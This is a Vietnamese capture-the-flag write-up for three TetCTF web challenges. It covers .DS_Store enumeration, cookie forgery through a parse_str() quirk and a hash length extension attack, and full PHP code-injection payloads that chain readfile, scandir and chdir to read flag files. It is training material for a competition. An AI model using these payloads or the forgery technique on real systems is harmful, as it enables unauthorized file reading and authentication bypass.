in

Writeup tetctf – Web Security

1. File

link: http://139.180.219.222:8004/

Hint là Mac nên mình nghĩ đến file DS_Store. Tải file DS_Store về sau đó phân tích và đọc file bằng tool Python-dsstore

Flag ở /h1ddenn/flag.txt:

TetCTF{__DS_Store__seems_sad__}

2. IQTest2

link: http://45.76.148.31:9004

hint source code: ?is_debug=1

Giả sử ta sửa cookie saved=base64_encode(“seed=abcxyz&level=xiii”) thì $seed=”abcxyz” và $level=NULL. Sau đó $exp=[“level=i”, “seed=abcxyz”, “level=xiii”] và nhờ tác dụng của hàm parse_str() thì $level=”xiii”. Việc còn lại chỉ cần bypass check hash bằng Hash Length Extension Attacks. Mình sử dụng tool Hash Extender. Sử dụng các cookie ở level 1 và thử với length secret từ 2 đến 25:

Sau quá trình thử thì đã đúng với secret length là 11:

Flag:

3. phplimit revenge và phplimit revenge v2:

link: http://139.180.219.222/http://45.76.181.81/

Ở v1 thì flag nằm ở cùng thư mục nên mình sử dụng readfile(end(glob(*))):

Payload: readfile(end(glob(chr(strlen(uniqid(uniqid(uniqid(rad2deg(pi())))))))));

Flag:

Ở v2 thì flag nằm ở thư mục trên và không được sử dụng strlen() nên mình thọt sml. Cuối cùng phải xin hint từ đàn anh và được vứt cho 1 cái payload magic vcl :)). Cơ bản payload là sẽ thực hiện chdir(..) hay chdir(next(scandir(.))) và readfile(end(scandir(.))):

Payload: readfile(end(scandir(chr(round(log(rad2deg(rad2deg(rad2deg(rad2deg(rad2deg(rad2deg(rad2deg(rad2deg(rad2deg(rad2deg(rad2deg(pi(chdir(next(scandir(chr(round(log(rad2deg(rad2deg(rad2deg(rad2deg(rad2deg(rad2deg(rad2deg(rad2deg(rad2deg(rad2deg(rad2deg(pi())))))))))))))))))))))))))))))))))));

Flag:

Link: no3g.wordpress.com/2019/01/07/writeup-tetctf-web-security/

What do you think?

0 points
Upvote Downvote

[Sưu tầm] Luật an ninh mạng có hiệu lực từ 1/1/2019

Dịch ngược cơ bản (Phần 1)